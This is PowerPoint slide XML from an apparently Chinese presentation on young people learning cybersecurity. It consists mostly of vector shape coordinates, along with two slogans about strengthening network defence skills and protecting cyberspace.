                  <a:pt x="288693" y="85468"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="193700" y="180461"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301971" y="180461"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="303686" y="171298"/>
                  <a:pt x="304800" y="162001"/>
                  <a:pt x="304800" y="152400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="304800" y="128273"/>
                  <a:pt x="298694" y="105747"/>
                  <a:pt x="288693" y="85468"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="200549" y="145161"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="278682" y="67066"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="260080" y="39643"/>
                  <a:pt x="232543" y="19241"/>
                  <a:pt x="200549" y="8525"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="200549" y="145161"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="159525" y="200549"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="237677" y="278721"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="265138" y="260156"/>
                  <a:pt x="285560" y="232581"/>
                  <a:pt x="296275" y="200549"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="159525" y="200549"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="180432" y="111862"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180432" y="2829"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="171317" y="1133"/>
                  <a:pt x="162001" y="0"/>
                  <a:pt x="152400" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128064" y="0"/>
                  <a:pt x="105366" y="6229"/>
                  <a:pt x="84963" y="16393"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="180432" y="111862"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="124368" y="193853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="124368" y="301981"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="133483" y="303686"/>
                  <a:pt x="142799" y="304800"/>
                  <a:pt x="152400" y="304800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176508" y="304800"/>
                  <a:pt x="198987" y="298694"/>
                  <a:pt x="219266" y="288722"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124368" y="193853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="104232" y="159763"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26194" y="237792"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44758" y="265176"/>
                  <a:pt x="72276" y="285569"/>
                  <a:pt x="104232" y="296285"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="104232" y="159763"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="2829" y="124368"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1133" y="133483"/>
                  <a:pt x="0" y="142799"/>
                  <a:pt x="0" y="152400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="176584"/>
                  <a:pt x="6144" y="199130"/>
                  <a:pt x="16145" y="219408"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="111195" y="124358"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2829" y="124358"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="66637" y="26489"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="39443" y="45053"/>
                  <a:pt x="19183" y="72428"/>
                  <a:pt x="8525" y="104232"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="144389" y="104232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66637" y="26489"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1635083" y="1944112"/>
            <a:ext cx="543378" cy="543378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="0" y="91440"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="152400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="91440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="121920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="121920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="91440"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="0" y="274320"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="304800" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="274320"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="30480" y="243840"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="274320" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30480" y="274320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30480" y="243840"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="30480" y="121920"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="91440" y="121920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91440" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30480" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30480" y="121920"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="121920" y="121920"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="182880" y="121920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182880" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121920" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121920" y="121920"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="213360" y="121920"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="274320" y="121920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213360" y="243840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213360" y="121920"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9410812" y="1961479"/>
            <a:ext cx="555095" cy="555095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="209550" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="156943" y="0"/>
                  <a:pt x="114300" y="42643"/>
                  <a:pt x="114300" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114300" y="101213"/>
                  <a:pt x="114852" y="107042"/>
                  <a:pt x="115900" y="112700"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="228600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="285750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="296275"/>
                  <a:pt x="8525" y="304800"/>
                  <a:pt x="19050" y="304800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38100" y="304800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76200" y="285750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76200" y="247650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="247650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="209550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152400" y="209550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177117" y="184833"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="187242" y="188500"/>
                  <a:pt x="198158" y="190500"/>
                  <a:pt x="209550" y="190500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262157" y="190500"/>
                  <a:pt x="304800" y="147857"/>
                  <a:pt x="304800" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="304800" y="42643"/>
                  <a:pt x="262157" y="0"/>
                  <a:pt x="209550" y="0"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
              <a:path w="304800" h="304800">
                <a:moveTo>
                  <a:pt x="238087" y="95288"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="222304" y="95288"/>
                  <a:pt x="209512" y="82496"/>
                  <a:pt x="209512" y="66713"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209512" y="50930"/>
                  <a:pt x="222304" y="38138"/>
                  <a:pt x="238087" y="38138"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="253870" y="38138"/>
                  <a:pt x="266662" y="50930"/>
                  <a:pt x="266662" y="66713"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266662" y="82496"/>
                  <a:pt x="253870" y="95288"/>
                  <a:pt x="238087" y="95288"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="3657600"/>
            <a:ext cx="2880360" cy="1718945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="114300" tIns="57150" rIns="114300" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>通过不断学习专业技能，提升网络安全的防范能力，为构建安全的网络环境打下坚实的基础。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382000" y="3657600"/>
            <a:ext cx="2880360" cy="1718945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="114300" tIns="57150" rIns="114300" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>积极投身网络强国与数字中国建设，以青年之智守护网络空间安全，共创健康网络新生态。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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7" name="TextBox 17"/>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青年学网络安全</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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
